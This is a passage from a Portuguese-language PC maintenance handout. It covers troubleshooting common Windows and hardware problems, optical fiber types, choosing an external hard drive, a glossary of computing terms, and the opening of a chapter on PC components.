acontecer, o problema é mau contato, e é necessário substituir o ca-
bo.

Vale a pena conferir também o volume de saída de som do Windows.


no canto inferior direito da tela, à esquerda do relógio, há um ícone de
alto falante. Clique nele, e uma barra de volume aparecerá. Verifique
se ela está em um nível adequado. Algumas vezes, o computador
automaticamente deixa o som no volume mínimo quando os fones de
ouvido são desconectados. Se você costuma usar fones, esse pode
ser o problema

Mas se o cabo estiver bom e o volume estiver alto, pode ainda se


tratar de um problema de driver. Verifique no Gerenciador de Disposi-
tivos se existe algum conflito nos dispositivos relacionados a som, e
procure na internet, no site do fabricante da sua placa mãe ou da sua
placa de som, pelos drivers mais recentes. O modelo das placas apa-
rece no Gerenciador de Dispositivos.

Touchpad não funciona

Entre usuários de notebooks, um problema particularmente frequente


é que o Touchpad deixe de funcionar. Isso é particularmente frustran-
te, pois navegar usando apenas o teclado, ainda que possível, é bas-
tante incômodo. Por isso, vale a pena ter um Mouse USB sobrando
para caso isso aconteça.

É possível, primeiramente, que o usuário tenha desligado acidental-


mente o Touchpad. Em geral, uma combinação das teclas Function
(“Fn”) e uma das teclas F de cima do teclado faz isso. Tente apertar

363
Fn+F7 ou Fn+F9: resolver o problema pode ser fácil assim. Alguns
modelos também automaticamente desligam o touchpad quando um
Mouse USB é conectado. É improvável, mas pode ser que outro dis-
positivo USB foi identificado como um Mouse. Nesse caso, desconec-
te os dispositivos USB e veja se o problema é solucionado.

Essa situação também pode ser fruto de um problema de driver, que


pode ser visualizado no Gerenciador de Dispositivos do Windows.
Procure sob a aba “mouses” no Gerenciador, e verifique se alguns
dos dispositivos listados apresenta problemas. Em todo caso, vale a
pena acessar o site do fabricante do touchpad para baixar drivers
atualizados. É possível descobrir o fabricante buscando na internet o
modelo do seu notebook.

Há também uma aba no painel de controle do windows dedicada aos


mouses e touchpads. Procure por “configurações do mouse” no menu
iniciar e, nele, procure pela aba referente ao touchpad. Ela deve ter
alguma opção como “habilitar touchpad”: garanta que elas esteja
ligada.

Não detecta rede WiFi

Existem diversos motivos pelos quais o seu computador ou notebook


não encontrem redes sem fio. Primeiramente, vale lembrar que nem
todos os computadores têm adaptadores WiFi instalados automati-
camente. É raro, mas pode ser que o seu não tenha. Basta buscar no
Gerenciador de Dispositivos por algo do tipo. Se nada aparecer, pode
ser necessário comprar um adaptador WiFi externo, USB, ou uma
placa de rede.

364
Entre os notebooks que possuem adaptadores WiFi, alguns deles
possuem também uma chavinha liga/desliga que controla o funcio-
namento desses adaptadores. Verifique se a sua chavinha está na
posição correta e tente novamente. Outra possibilidade é que a sua
máquina está no modo de economia de energia: nesse modo, alguns
notebooks desabilitam automaticamente o adaptador WiFi. Desative
essa função no painel de controle, ou ligue o notebook em uma to-
mada para acionar o dispositivo novamente.

Pode se tratar, ainda, de uma incompatibilidade entre seu roteador e


seu computador. Roteadores transmitem em 2.4 GHz ou 5Ghz, e
pode ser que o seu computador só consiga receber um desses sinais.
Ou, ainda, que a sua rede esteja configurada para não aparecer para
outras máquinas. Nesse caso, será necessário alterar as configura-
ções do roteador, um procedimento que varia segundo o modelo do
dispositivo.

Computador desliga sozinho

Assim como as telas azuis, existem muitos motivos que podem levar
computadores a desligarem do nada. Um deles são vírus: alguns
programas maliciosos podem ser responsáveis por reinicializações

365
inesperadas. Vale a pena escanear seu PC caso isso esteja aconte-
cendo.

Outro possível motivo, no entanto, é o superaquecimento de compo-


nentes do computador, especialmente o processador. O processador
possui um mecanismo que desacelera seu funcionamento caso sua
temperatura exceda determinado limite. Se a temperatura continua a
subir mesmo assim, ele se desliga para evitar danos maiores. Isso é
comum em máquinas rápidas, com grandes placas de vídeo, e entre
usuários que realizam overclocking, mas não acontece apenas nes-
ses casos.

Se você sente que sua máquina está ficando quente durante o funci-
onamento, abra-a e limpe a poeira. Isso deve ajudar. Se o problema
persistir, porém, pode ser necessário comprar um refrigerador melhor
para o seu processador. É importante também tomar cuidado com os
cabos dentro do gabinete do PC: se eles ficam jogados por todos os
lados, acabam dificultando a passagem de ar e aumentando a tempe-
ratura dos componentes.

Teclado estranho

Alguns usuários podem notar que as teclas que eles apertam no te-
clado não correspondem exatamente ao que aparece na tela. Isso
porque existem dois padrões diferentes de teclado para a língua por-
tuguesa, e é provável que, enquanto seu teclado esteja em um pa-
drão, o seu computador esteja configurado para o outro.

366
Para mudar isso, vá com o mouse ao canto inferior direito da tela,
perto do relógio. Deve haver um ícone de teclado por ali. Clique nele,
veja qual é a opção selecionada, e selecione a outra. As duas opções
são “Português Brasil - ABNT” e “Português Brasil - ABNT2”. Se seu
teclado foi comprado no Brasil, ele deve estar em uma delas.

Monitor não mostra nada

Se o seu computador liga normalmente e faz até mesmo o barulhinho


de inicialização do Windows, mas seu monitor não mostra nada, o
problema muito provavelmente está relacionado aos cabos. Verifique
primeiramente a integridade do cabo de vídeo que vai do computador
ao monitor. Tente mexer nele e veja se a imagem pisca na tela. Se
piscar, pode ser necessário substituir o cabo.

Vale notar também que alguns computadores possuem placas de


vídeo, e a saída de vídeo da placa é diferente da saída de vídeo da
placa mãe. Pode ser que o seu computador esteja enviando sinal de
vídeo pela placa de vídeo, mas o cabo esteja conectado à placa mãe
(ou vice-versa). Tente encaixar o cabo de vídeo em outra parte do
computador. Isso pode solucionar o problema.

Caso a imagem apareça mas em uma resolução muito baixa, trata-


se, provavelmente, de um problema de drivers. Verifique se a configu-
ração no Windows esta correta.

367
Computador demora para ligar e fica lento

Não é incomum que, com o tempo, os computadores demorem cada


vez mais para ligar e funcionem de forma cada vez mais lenta. Até
certo ponto, o desgaste dos componentes são responsáveis por isso.
O mais comum, no entanto, é que o computador tenha acumulado
uma série de programas pouco úteis que precisam ser iniciados junto
com o Windows, retardando a inicialização, e que continuam a funci-
onar sem aparecer, deixando o PC mais lerdo.

Uma forma de resolver esse problema é com a ferramenta de confi-


guração de sistema da Microsoft. Para acessá-la, basta apertar a
tecla do Windows junto com “R” no teclado. Isso abrirá uma janela
chamada “Executar”. Nela, escreva “msconfig” (sem as aspas) e
aperte enter. Pode ser necessário inserir a senha de administrador.

Na tela que aparecerá, é possível selecionar quais programas serão


inicializados com o sistema. Quanto menos programas forem inicia-
dos, mais rápido o computador liga. Mas é melhor não mexer em
quaisquer programas que tenham “Microsoft Corporation” no campo
de fabricante: esses programas podem estar relacionados ao funcio-
namento do Windows.

368
Em geral, é melhor não desligar os programas que você não conhe-
ce, mas outros, como AdobeAAMUpdater, Google Update, Pando
Media Booster, Spotify podem ser desligados sem problemas. Exis-
tem também programas como o CCleaner que permitem realizar essa
mesma seleção.
Pop-ups na área de trabalho

Se você costuma ver um monte de pop-ups estranhos antes mesmo


de abrir seu navegador, o mais provável é que o seu sistema tenha
sido infectado por algum tipo de adware (programas nocivos que fi-
cam mostrando propagandas ao usuário).

Abra o painel de controle e, na aba “programas”, procure por “desins-


talar um programa”. No menu que se abre, veja se há algum progra-
ma com nome suspeito ou relacionado a propagandas. Se não, a
ferramenta de configuração do sistema da Microsoft pode mostrar
alguns desses programas. Aperte a tecla do windows junto com a
tecla “R” e escreva “msconfig” (sem as aspas). Na janela que se abre,
verifique se há algum programa com nome suspeito e desative-o.
Lembre-se de não desativar programas da Microsoft.

369
Alguns adwares, porém, não aparecem no msconfig. Nesse caso, é
necessário um programa especializado, como o CCleaner, para re-
mover esses programas.

Fibras ópticas não são todas iguais

O que são fibras ópticas monomodo e multimodo? E porque escolher


entre uma e outra pode fazer toda a diferença no seu projeto?

Nem todo mundo sabe, mas há mais de um tipo de fibra óptica no


mercado. A escolha entre os modelos disponíveis pode determinar
não só se a montagem da rede sairá mais cara ou mais barata, mas
se vai funcionar direito.

As fibras se dividem basicamente em multimodo ou monomodo. Por


fora elas são bem parecidas e, por serem muito pequenas, é pratica-
mente impossível distingui-las a olho nu. Até o observador mais aten-
to pode se enganar com elas, porque suas medidas também são
muito próximas.

Por dentro da fibra


O cabo de fibra óptica é construído de três camadas: o revestimento
(parte externa), a casca e o núcleo - que precisam ser constituídos de
material reflexivo. Na parte interna, a luz viaja rapidamente enquanto
se choca com as bordas, num efeito semelhante ao dos raios de Sol
quando batem num espelho.

Os cabos multimodo têm o núcleo menos denso. Por isso, esse nú-
cleo é mais largo e a luz ganha mais espaço para “quicar” lá dentro.
Assim, é possível termos o trânsito de vários feixes de luz simultane-
amente, desde que tenham o mesmo comprimento de onda. Com
essas características, no entanto, o alcance do feixe de luz é menor.
A exemplo do Sol: quanto mais a luz bate nas bordas do cabo, mais
fraca ela fica - como ocorre com a luz do Sol, que vai sumindo quan-
do refletida de um espelho a outro.

Essas características fazem com que os cabos multimodo sejam uma


má escolha para transmissões externas, pois eles têm um alcance
máximo de cerca de 2 km. Por outro lado, são ideais para redes in-

370
ternas que interligam computadores em empresas e instituições de
ensino, por exemplo.

Menos reflexão, mais distância


Para alcances maiores é preciso usar cabos monomodo, que, ao
contrário dos multimodo, têm núcleos mais densos. Dessa forma,
cabe apenas um feixe de luz lá dentro, mas ele viaja a longas distân-
cias sem muita necessidade de se apoiar nas bordas, o que causa
menos danos ao sinal.

Os conversores e transceivers voltados a fibras multimodo são mais


baratos, pois não precisam usar fontes de luz de qualidade elevada e,
geralmente, operam com LED. Já os equipamentos destinados ao
monomodo são mais caros, pois usam laser, e a sua potência deve
ser proporcional à distância que se deseja alcançar. É preciso prestar
atenção a essa questão porque os switches costumam ser compatí-
veis tanto com fibras multimodo quanto monomodo. Os transceivers
são diferentes. Ao escolher o transceiver, você precisará analisar o
modelo adequado para uma rede de menor ou de maior alcance.

7 dicas importantes para escolher um HD externo

Um HD externo pode ser útil para uma variedade de situações. Por


exemplo, caso você sinta necessidade de aumentar a capacidade de
armazenamento do seu computador, mas não se sinta à vontade para
abri-lo e conectar um novo HD à placa mãe. Ou caso você queira
guardar seus filmes, músicas e fotos em outro lugar, de forma a dei-
xar mais espaço para outros arquivos na sua máquina.

371
Outra possibilidade, ainda, é se você costuma transferir grandes
quantidades de arquivos volumosos entre diversas máquinas. Ou,
ainda, se você quiser criar um bakup do seu computador e poder
levá-lo com você onde quer que você vá.

Os usos que podem ser feitos de um HD externo são diversos, e isso


se reflete na grande quantidade de opções disponíveis no mercado.
Pensando nisso, citamos abaixo os sete fatores que você deve consi-
derar na hora de comprar um HD externo. Esperamos que eles te
ajudem a escolher o dispositivo mais adequado para o seu padrão de
uso!

Tipo de HD externo

Os HDs externos existentes no mercado podem ser divididos, basi-


camente, em dois tipos: os HDs externos de mesa (desktop-style) e
os HDs externos portáteis (notebook-class). Os de mesa costumam
ser maiores, mais pesados (portanto menos portáteis) mas mais rápi-
dos e com mais capacidade (podendo chegar a mais de 10TB nos
mais caros), e alguns deles exigem um adaptador de força - ou seja,
além de conectá-los via USB, é preciso também ligá-los numa fonte
de energia. Os portáteis, como o nome indica, são menores e mais
leves, mas possuem capacidade menor (em geral até 2TB) e veloci-
dade de transferência um pouco menor também.

O uso que você pretende fazer do HD externo vai determinar qual tipo
é mais adequado. Os de mesa são difíceis de se levar por aí, então
eles provavelmente serão mais úteis para expandir a capacidade de
um desktop que usa muitos dados, para manter um backup atualiza-
do de arquivos grandes e sensíveis ou para criar uma espécie arquivo

372
ou repositório digital de fotos, vídeos e músicas, por exemplo. Um tipo
uso adequado para esses HDs seria para expandir a capacidade de
armazenamento de uma ilha de edição.

Agora, se você pretende levar o seu HD externo para lá e para cá,


trocando arquivos com diversos computadores, sem dúvida um HD
portátil será mais eficiente. O sacrifício de espaço de armazenamento
e de velocidade de transferência valem a portabilidade e a conveni-
ência de us que você ganha com HDs desse tipo.

Conexões

A velocidade de transferência de dados entre seu HD externo e os


computadores aos quais você irá conectar será determinada, em
grande parte, pelo tipo de conexão que você usa. Atualmente, a mai-
oria dos HDs externos possuem pelo menos conexões USB 3.0, que
prometem taxas de transferência de até 5 Gbps (cerca de 625 MB/s,
embora, na prática, velocidades de cerca de 200 MB/s sejam mais
comuns).

Alguns deles possuem outros tipos de conexões mais rápidas ainda,


como USB 3.1, Thunderbolt ou e SATA. Alguns HDs externos de
mesa possuem também sinal WiFi, e permitem que você se conecte a
eles via internet sem fio para enviar dados para ele (ou receber dados
dele). Essas outras opções de conectividade, no entanto, costumam

373
se traduzir num preço um pouco mais salgado. Mas, em alguns ca-
sos, o investimento extra pode valer a pena.

São poucos os HDs externos que ainda possuem apenas conexões


USB 2.0, e eles só valerão a pena se o preço for consideravelmente
menor (e se você não se incomodar esperar). Isso porque, como se
trata de um dispositivo usado para transferir grandes quantidades de
dados, uma conexão mais lenta fará uma enorme diferença.

Vale lembrar que só será possível aproveitar as conexões do HD


externo se os computadores aos quais você for conectá-los também
tiverem conexões desse mesmo tipo! Caso você pretenda usar seu
HD externo majoritariamente com um computador que só possui por-
tas USB 2.0, conexões mais rápidas que essa no HD não poderão ser
aproveitadas.

Velocidade

Quando se trata de HDs externos, a velocidade e as conexões são


questões separadas. Por conexões, entendemos a capacidade que o
HD tem de transferir arquivos para outras máquinas (e receber arqui-
vos de outras máquinas). Quando falamos de velocidade, porém, nos
referimos à agilidade com a qual o HD é capaz de acessar dados
contidos nele mesmo.

374
Essa característica costuma ser medida em medida em RPMs, assim
como nos HDs internos, e, grosseiramente, quanto mais RPMs, mais
rápido o HD. Esse valor costuma girar entre 4200 RPM nos mais len-
tos e 10000 RPM nos mais rápidos (se bem que velocidades superio-
res a 7200 RPM, no geral, só poderão ser aproveitadas com cone-
xões mais rápidas que o USB 3.0).

Essa questão é especialmente importante para HDs externos de me-


sa. Como eles costumam ficar ligados sempre a uma mesma máqui-
na, não faz sentido transferir os dados dele para o computador antes
de acessá-los. Um HD com boa velocidade funcionará quase como
um HD interno do seu computador, e lhe permitirá acessar rapida-
mente todo o conteúdo dele.

Aqui também vale lembrar que a conexão do HD com o seu compu-


tador pode ser um gargalo. Se você ligar um HD externo de 10000
RPM ao seu computador via USB 1.1, por mais que o HD externo
consiga ler os dados muito rapidamente, ele só conseguirá enviá-los
ao computador numa taxa muito pequena. Nesse caso, a alta veloci-
dade acabará se perdendo no caminho.

Capacidade

HDs externos portáteis em geral possuem capacidades de até 2 TB,


embora algumas fabricantes ofereçam modelos um pouco maiores (e
mais caros). Quanto maior a capacidade do HD portátil, maior será,
também, seu preço. Mas a relação capacidade X preço não é direta:
um HD portátil de 2GB não custará o dobro do preço de um de 1TB.
Por esse motivo, se dinheiro não for um fator limitante, vale a pena
investir no maior.

375
Caso contrário, procure algo que atenda às suas necessidades. Se
você não costuma movimentar arquivos maiores de 10GB e não faz
questão de manter muitos arquivos armazenados ao mesmo tempo,
pode ser mais eficiente comprar um pendrive de grande capacidade
do que investir num HD externo. Por outro lado, se você quer guardar
toda a sua vida digital em um só dispositivo, pode valer a pena sacri-
ficar a portabilidade em nome de uma capacidade de armazenamento
maior e investir em um HD externo de mesa, que pode chegar a mais
de 10TB de capacidade - embora ele venha com um preço adequado
a seu tamanho.

Compatibilidade

É necessário prestar atenção também ao sistema operacional do(s)


computador(es) a que você pretende conectar o seu HD externo.
Windows e Mac trabalham com sistemas de arquivo diferentes (NTFS
e HFS+ respectivamente), e por esse motivo, a maioria dos fabrican-
tes oferece modelos específicos para cada plataforma. Os softwares
de backup e guias de uso que costumam vir com os HDs externos
também são pensados para um dos dois sistemas operacionais, en-
tão isso também deve ser considerado.

Os Macs até conseguem ler arquivos de um HD em NTFS mas, nati-


vamente, não conseguem gravar arquivos neles. Será necessário
instalar um programa separado no seu Mac, como o NTFS-3G, caso
você pretenda usar o mesmo HD para transferir arquivos de um sis-
tema para o outro. Caso essa seja uma questão crucial para você,

376
talvez valha a pena pesquisar algum serviço de armazenamento na
nuvem que permita contornar essa dificuldade.

Para usuários de Linux, todos os HDs externos compatíveis com


Windows devem funcionar normalmente. No caso de HDs voltados
para Mac, pode ser melhor conferir com a loja antes de comprar.

Segurança
Alguns HDs externos oferecem opções de criptografia baseadas em
software ou hardware. Se a proteção dos dados contidos no HD ex-
terno é algo essencial, o mais adequado é investir em um dispositivo
que possua criptografia baseada em hardware.
A diferença entre a criptografia baseada em hardware e em software
é que a criptografia baseada em software utiliza os recursos do com-
putador ao qual ela se conecta para codificar os dados. Assim, um
aparelho com esse tipo de proteção será apenas tão segura quanto o
computador ao qual ela está conectado.

HDs com criptografia baseada em hardware, por outro lado, possuem


em sua arquitetura um chip dedicado à codificação das informações
contidas nele. Com isso, não ficam à mercê da máquina à qual se
conectam. O chip dedicado também impede que a segurança dos
dados atrapalhe o desempenho do HD na hora de transferir dados.

SSDs externos

Assim como existem HDs internos e externos, existem SSDs internos


e externos também. Os SSDs externos oferecem os mesmos benefí-

377
cios em relação aos HDs que suas versões internas: são mais rápi-
dos, mais leves e mais resistentes a choques. Oferecem também a
mesma grande desvantagens: são muito mais caros.

Quando se trata de um dispositivo de armazenamento interno, o pre-


ço elevado do SSD é compensado pela velocidade muito superior
dele, que será traduzida num desempenho muito mais rápido do seu
PC. Mas, em se tratando de dispositivos externos, essa vantagem
não aparece tanto: a velocidade superior do SSD provavelmente es-
barrará em algum gargalo, como a velocidade da conexão por meio
da qual ele se liga à sua máquina. A não ser que você possua uma
conexão de ponta, como a Thunderbolt, a diferença entre um HD
externo e um SSD externo dificilmente será visível.

Assim, via de regra, é melhor ter um SSD dentro do seu computador


do que fora dele, a não ser que você possua conexões de ponta e
não se incomode com o considerável investimento a mais que isso
acarretará.

Sobre Hardware

Buffer
Armazenamento temporário para dados, que ajuda a amenizar a
transferência de informações.

Um dispositivo poderá continuar a enviar dados mesmo quando o


outro não esteja propriamente pronto para os usar.

Por exemplo: um baffer de impressora armazena a informação envia-


da pelo computador permitindo que esta faça outras operações sem
interferir no andamento da impressão.

Cache
Memória especial de alta velocidade utilizada para armazenar dados,
agilizando assim a performance do computador.

Clipboard ou Área de transferência


(conhecida popularmente como copiar e colar) é um recurso utilizado
por um sistema operacional para o armazenamento de pequenas

378
quantidades de dados para transferência entre documentos ou aplica-
tivos, através das operações decortar, copiar e colar bastando ape-
nas clicar com o botão direito do mouse e selecionar uma das op-
ções.

O uso mais comum é como parte de uma interface gráfica, e geral-


mente é implementado como blocos temporários de memória que
podem ser acessados pela maioria ou todos os programas do ambi-
ente.

Implementações antigas armazenavam dados como texto plano, sem


meta informações como tipo de fonte, estilo ou cor. As mais recentes
implementações suportam múltiplos formatos de dados, que variam
entre RTF e HTML, passando por uma variedade de formatos de
imagens como bitmap e vetor até chegar a tipos mais complexos
como planilhas e registros de banco de dados.

Cluster
Um cluster consiste em computadores vagamente ou fortemente liga-
dos que trabalham em conjunto para que, em muitos aspectos, eles
possam ser vistos como um único sistema.

Ao contrário da computação em grade, um cluster tem, para executar


a mesma tarefa, cada conjunto de nós controlado e programado por
software.

A ideia inicial que conduz ao cluster foi desenvolvida na década


de 1960 pela IBM como uma forma de interligar grandes mainframes,
visando obter uma solução comercialmente viável de paralelismo.

Nesta época o sistema HASP (Houston Automated Spooling Pro-


gram) da IBM e seu sucessor o JES (Job Entry System) proviam uma
maneira de distribuir tarefas nos mainframes interligados.

A IBM ainda hoje (2001) suporta o cluster de mainframes através


do Parallel Sysplex System, que permite ao hardware, sistema opera-
cional, middleware e software de gerenciamento do sistema prover
uma melhora dramática na performance e custo ao permitir que usuá-

379
rios de grandes mainframes continuem utilizando suas aplicações
existentes.

Entretanto, o cluster ganhou força até que três tendências convergi-


ram noas anos 80: microprocessadores de alta performance, redes
de alta velocidade, e ferramentas padronizadas para computação
distribuída de alto desempenho.

Uma quarta tendência possível é a crescente necessidade de poder


de processamento para aplicações cientificas e comerciais unidas ao
alto custo e a baixa acessibilidade dos tradicionais supercomputado-
res

Np final de 1993, Donald Becker e Tomas Sterling, iniciaram um es-


boço de um sistema de processamento distribuido constiruido a partir
de hardware convencional como uma medida de combare aos custos
dos supercomputadores.

No início de 1994, trabalhando no CESDIS, com o patrocínio do pro-


jecto HTPCC/ESS, criaram o primeiro cluster desse tipo, o projec-
to Beowulf.

O protótipo inicial era um cluster de 16 processadores DX4 ligados


por dois canais Ethernet acoplados (Ethernet bonding). A máquina foi
um sucesso instantâneo e esta ideia rapidamente se espalhou pelos
meios académicos, pela NASA e por outras comunidades de pesqui-
sa.

Zif Socket
ZIF é a abreviatura em inglês para Zero Insertion Force ("Força de
Inserção Zero"), um conceito utilizado
no design de soquetes de circuitos integrados, criado para evitar pro-
blemas causados pela força aplicada na inserção e extração de CIs.

Sobre Software

ActiveX
ActiveX é um framework já em processo de obsolescência, criado
pela Microsoft que adapta as antigas versões das plataformas COM -

380
Component Object Model e OLE - Object Linking and Embed-
ding para conteúdo disponível online, especialmente aplicações web
e cliente/servidor.

Foi lançado em 1996 para a plataforma Windows, suportando nativa-


mente somente a mesma. A ideia é servir para criação de componen-
tes de software reutilizáveis, conhecidos como controles, que reali-
zam uma função particular ou um conjunto delas de um modo que
sua utilização pode ser aplicada em qualquer outro aplicati-
vo Microsoft Windows, como o Microsoft Office e Microsoft Visual
Studio, entre outros. Uma aplicação pode ser composta de um ou
mais destes componentes a fim fornecer suas funcionalidades.

O ActiveX é uma tecnologia ainda comumente utilizada para o desen-


volvimento de páginas dinâmicas. Tem presença na programação do
lado do servidor e do lado do cliente, embora existam diferenças no
uso em cada um desses casos.

O ActiveX tinha por objetivo facilitar a integração entre diversas apli-


cações, mas atualmente esta tecnologia foi substituída pelo .NET,
também da Microsoft, ou melhor ainda pela utilização de pa-
drões W3C – HTML5, Javascript e HTTP/REST.

Em 2015, o Microsoft Edge, substituto do Internet Explorer, já não


oferece mais suporte ao ActiveX, marcando assim o fim da tecnolo-
gia.

API
API provém do Inglês Application Programming Interface, (Interface
de Programação de Aplicação), é um conjunto de rotinas e padrões
estabelecidos por umsoftware para a utilização das suas funcionali-
dades por aplicativos que não pretendem envolver-se em detalhesda
implementação do software. mas apenas usar seus serviços.

De modo geral, a API é composta por uma série de funções acessí-


veis somente por programação, e que permitem utilizar característi-
cas do software menos evidentes ao utilizador tradicional.

381
Por exemplo, um sistema operacional possui uma grande quantidade
de funções na API, que permitem ao programador criar janelas, aces-
sar arquivos, cifrar dados etc. Mas as APIs dos sistemas operacionais
costumam ser dissociadas de tarefas mais essenciais, como a mani-
pulação de blocos de memória e acesso a dispositivos.

Essas tarefas são atributos do núcleo de sistema e raramente são


programáveis.[3] Outro exemplo são programas de desenho geométri-
co que possuem uma API específica para criar automaticamente enti-
dades de acordo com padrões definidos pelo utilizador.

Mais recentemente, o uso de API tem se generalizado nos plugins


(acessórios que complementam a funcionalidade de um programa).

Os autores do programa principal fornecem uma API específica para


que outros autores criem plugins, estendendo as funcionalidades do
programa.

BUG
Um bug (pronúncia em português: [bɐɡ], termo da língua inglesa que
significa, neste contexto, "defeito") é um erro no funcionamento co-
mum de um software (ou também de hardware), também chamado de
falha na lógica de um programa, e pode causar comportamentos
inesperados, como resultado incorreto ou comportamento.

Em 1946, com o surgimento do Eniac, dado ao calor gerado pelos


seus componentes (válvulas eletrônicas), insetos costumavam se
alojar em seu interior causando problemas ao equipamento, tais co-
mo: curtocircuitos e falhas nos resultados, assim gerou-se a expres-
são BUG para qualquer defeito em software ou hardware, usada até
os dias de hoje.

Encriptação
Em criptografia, encriptação é o processo de transformar informação
(purotexto).

Usando um algoritmo (chamado cifra) de modo a impossibilitar a sua


leitura a todos menos para aqueles que possuam uma identificação
particular, geralmente referida como de chave. O resultado deste

382
processo é uma informação encriptada, também chamado de texto
cifrado.

Em alguns contextos, o termo encriptação também se refere implici-


tamente ao processo inverso.

Decriptação (português brasileiro) ou desencriptação (português europeu), tornando


a informação encriptada novamente legível (isto é, torná-la desencrip-
tada). Com isso, software criptográficos geralmente fazem também a
desencriptação.

Freware
Software gratuito ou freeware é qualquer programa de computador
cuja utilização não implica no pagamento de licenças de uso ou royal-
ties.

É importante não confundir o free de freeware com o free de free


software, pois no primeiro uso o significado é de gratuito, e no segun-
do de livre.

Memória Flash
Memória flash é uma memória de computador do tipo EEPROM
(Electrically-Erasable Programmable Read-Only Memory), desenvol-
vida na década de 1980 pela Toshiba, cujos chips são semelhantes
ao da Memória RAM, permitindo que múltiplos endereços sejam apa-
gados ou escritos numa só operação.

Memória Virtual
Memória virtual é uma técnica que usa a memória secundária como
uma cache para armazenamento secundário.

Houve duas motivações principais: permitir o compartilhamento segu-


ro e eficiente da memóriaentre vários programas e remover os trans-
tornos de programação de uma quantidade pequena e limitada
na memória principal.

Pixel
Pixel (sendo o plural pixels ou píxeis).

383
(aglutinação de Picture e Element, ou seja, elemento de imagem,
sendo Pix a abreviatura em inglês para Pictures) é o menor elemento
num dispositivo de exibição (como por exemplo um monitor), ao qual
é possível atribuir-se uma cor.

De uma forma mais simples, um pixel é o menor ponto que forma


uma imagem digital, sendo que o conjunto de milhares de pixels for-
mam a imagem inteira.

Num monitor colorido, cada Pixel é composto por um conjunto de 3


pontos: verde, vermelho e azul. Nos melhores monitores cada um
destes pontos é capaz de exibir 256 tonalidades diferentes (o equiva-
lente a 8 bits) e combinando tonalidades dos três pontos é então pos-
sível exibir pouco mais de 16.7 milhões de cores diferentes (exata-
mente 16.777.216).

Em resolução de 640 x 480 temos 307.200 pixels, a 800 x 600 temos


480.000 pixels, a 1024 x 768 temos 786.432 pixels e assim por dian-
te.

Shareware
Shareware é um programa de computador disponibilizado gratuita-
mente, porém com algum tipo de limitação.

Sharewares geralmente possuem funcionalidades limitadas e/ou tem-


po de uso gratuito do software limitado, após o fim do qual o usuário é
requisitado a pagar para acessar a funcionalidade completa ou poder
continuar utilizando o programa.

Um shareware está protegido por direitos autorais.

Esse tipo de distribuição tem como objetivo comum divulgar o softwa-


re, assim os usuários podem testá-lo antes da aquisição.

Twain
Twain é um protocolo que permite que qualquer scanner, câmera ou
vídeo funcione com qualquer programa de gráficos.

384
A interface do software TWAIN faz a tradução entre o software o o
hardware.

Vetor
Em geometria analítica, um vetor é uma classe de equipolência
de segmentos de reta orientados, que possuem todos a mesma in-
tensidade (denominada norma ou módulo), mesma direção e mesmo
sentido. Em alguns casos, a expressão vetor espacial também é utili-
zada.

Neste contexto, um vetor pode ser representado por qualquer seg-


mento de reta orientado que seja membro da classe deste vetor (ou
seja: pode ser representado por qualquer segmento de reta orientado
que possua os mesmos módulo, direção e sentido de qualquer outro
segmento da referida classe).

De maneira mais formal, um vetor é definido como sendo uma classe


de equipolência de segmentos de reta orientados em um espaço ve-
torial de n dimensões. Assim sendo, em um espaço vetorial de 3 di-
mensões, cada vetor será dotado de três coordenadas, comumente
denominadas x, y e z.

Quando falamos em distância geométrica "de A para B", podemos


imaginar que o ponto A está sendo "carregado" até chegar ao ponto
B.

Muitas operações algébricas nos números reais possuem for-


mas análogas para vetores. Vetores podem ser adiciona-
dos, subtraídos, multiplicados por um número e invertidos.

Essas operações obedecem às conhecidas leis da álgebra: comutati-


vidade, associatividade e distributividade.

A soma de dois vetores com o mesmo ponto inicial pode ser encon-
trada geometricamente usando a regra do paralelogramo.

A multiplicação por um número positivo (comumente chama-


do escalar), nesse contexto, se resume a alterar a magnitude do ve-

385
tor, isto é, alongando ou encurtando-o porém mantendo o seu senti-
do.

Os vetores têm aplicação em várias áreas do conhecimento, tanto


técnico quanto científico, como física, engenharia e economia, por
exemplo, sendo os elementos a partir dos quais se constrói o Cálculo
Vetorial, largamente utilizado em computação.

386
BIBLIOGRAFIA:

Os textos desta apostila foram, em sua maioria, compilados da inter-


net, de diversos autores, também da wikipedia.
“https://pt.wikipedia.org/”, e do Olhar Digital:
“http://olhardigital.uol.com.br/home”.

Os artigos de alguns autores foram atualizados, sem desmerecer o


conteúdo.

Edição 2
Ano 2018

387
UNIVERSIDADE FEDERAL DO ESPÍRITO SANTO

Manutenção de computadores, Formatação e solução de problemas


comuns

PET Engenharia de Computação - DI-UFES


www.inf.ufes.br/~pet

Peças que formam um pc


O que determina se um pc é bom ou ruim
Entradas da placa mãe
Montagem do computador
Compatibilidade da placa mãe com o processador .
Diferenças entre memórias
Processadores
Formatação do HD e Instalação de Sistemas Operaci-
onais
Preparação para formatação do HD
Reavaliar a necessidade de formatá-lo
Salvar arquivos e informações desejados em um lugar que não
vai ser formatado
Dando boot pelo CD
Formatando e instalando Windows
Instalando o Ubuntu
Recuperando o GRUB
Instalação dos drivers
Soluções de problemas comuns
O computador não liga
Alimentação externa
Fonte do computador e cabeamento
O computador liga e ouço barulhos, mas não aparece nada na
tela
Verificando o vídeo
O computador reinicia sozinho
O mouse não funciona
O computador travou
Código de bips da BIOS
Erros comuns na montagem de computador
Placa mãe

388
Disco rígido e CD ROM
Memórias
Manutenção preventiva no hardware
O que é
Unidade de CD (DVD-ROM, CD-RW)
Teclado (Keyboard).
Monitor CRT /Scanner
Monitor LCD
Impressora a Jatos de Tinta
Placa mãe
Placas em geral (Placas conectadas nos slots do computador)
Coolers
Fonte de Alimentação (power suply
Gabinete ou Box do PC
Manutenção porftware
Desfragmentação de disco
Corrigindo erros no disco
Desinstalação de programas desnecessários
Limpeza do registro do Windows
Proteção contra vírus e spywares
Sequência para formatação e instalação

Capítulo 1

Peças que formam um pc

PC significa “Personal Computer”, ou “Computador pessoal”. Os com-


putadores que hoje são chamados de PCs são derivados do IBM
PC, criado no início dos anos 80. Os PCs modernos não são mais
exclusividade de um pequeno grupo de grandes fabricantes. Como
todas as peças que formam um PC são encontradas com facilidade no
comércio, qualquer pequena loja pode ser produtora de PCs. Muitos
usuários também constroem seus próprios PCs, bastando que tenham
conhecimento técnico para tal.

- Gabinete: Local onde o micro é alojado; é a “caixa” do micro. Den-


tro do gabinete vem a fonte de alimentaço. Esse gabinete deve ser
escolhido de acordo com a placa-mãe escolhida.

389
- Placa-mãe: Também denominada mainboard ou motherboard, é
uma placa de circuito impresso, que serve como base para a instala-
ção dos demais componentes de um computador, como o processa-
